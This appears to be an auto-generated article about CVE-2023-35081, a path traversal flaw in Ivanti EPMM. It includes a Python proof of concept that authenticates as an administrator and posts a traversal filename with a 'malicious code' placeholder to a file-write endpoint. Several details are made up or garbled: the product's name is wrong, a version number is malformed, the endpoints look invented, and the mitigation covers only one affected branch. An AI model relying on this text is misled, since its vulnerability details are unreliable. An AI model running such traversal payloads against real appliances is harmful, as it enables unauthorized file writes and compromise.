CVE-2023-35081: Path Traversal Vulnerability in Ivanti EPMM Versions - Write Arbitrary Files on Appliance

A path traversal vulnerability (CVE-2023-35081) has been discovered in Ivanti Endpoint Patch Manager for Mac (EPMM) versions 11.10.x (prior to 11.10..3), 11.9.x (prior to 11.9.1.2) and 11.8.x (prior to 11.8.1.2). This vulnerability allows an authenticated administrator to write arbitrary files onto the appliance, potentially leading to further exploitation if left unaddressed. This article will discuss the details of the vulnerability, including a code snippet example and how to reproduce the exploit. We'll also provide links to official references and mitigation steps to secure your EPMM installation.

Details of the Vulnerability

The path traversal vulnerability arises due to improper validation of user-supplied input, which can be exploited by an authenticated administrator. The attacker has the ability to create or modify arbitrary files on the EPMM appliance by sending crafted requests with specially crafted paths. This can result in various negative effects, including unauthorized access, execution of arbitrary code, or even full system compromise.

The following code snippet demonstrates a proof-of-concept (PoC) exploit that could be used to write a malicious payload to an arbitrary location on the EPMM appliance:

import requests

# Update the target_url, username, and password variables to match your environment
target_url = 'https://EPMM_SERVER_URL';
username = 'admin'
password = 'password'

# Authorization and session setup
session = requests.Session()
login_payload = {
    'username': username,
    'password': password
}
login_request = session.post(f'{target_url}/Account/LogOn?ReturnUrl=%2F', data=login_payload)

# Path traversal exploit
file_payload = {
    'fileName': '/../../../../../../../../../var/tmp/some_file.txt',
    'inputData': 'Insert malicious code here'
}
write_file_request = session.post(f'{target_url}/Crypto/FileWrite', data=file_payload)

To successfully execute the exploit, the attacker must possess administrative credentials for the targeted EPMM system.

1. Ivanti Security Advisory - EPM-2551
2. CVE-2023-35081 on MITRE
3. CVE-2023-35081 on NVD

Mitigation Steps

Ivanti recommends that users running affected versions should update their EPMM installations to the latest patch available:

For EPMM 11.8.x, update to 11.8.1.2 or later.

These updated versions can be obtained from the Ivanti Support Portal.

Conclusion

To protect your Ivanti EPMM installation from this path traversal vulnerability (CVE-2023-35081), it's essential to keep your software updated and apply the latest patches. Monitor official sources for any new vulnerabilities or patches, and implement the recommended security measures. By staying informed and vigilant, it becomes easier to safeguard your systems against potential exploitation.

Timeline

Published on: 08/03/2023 18:15:00 UTC
Last modified on: 08/08/2023 20:25:00 UTC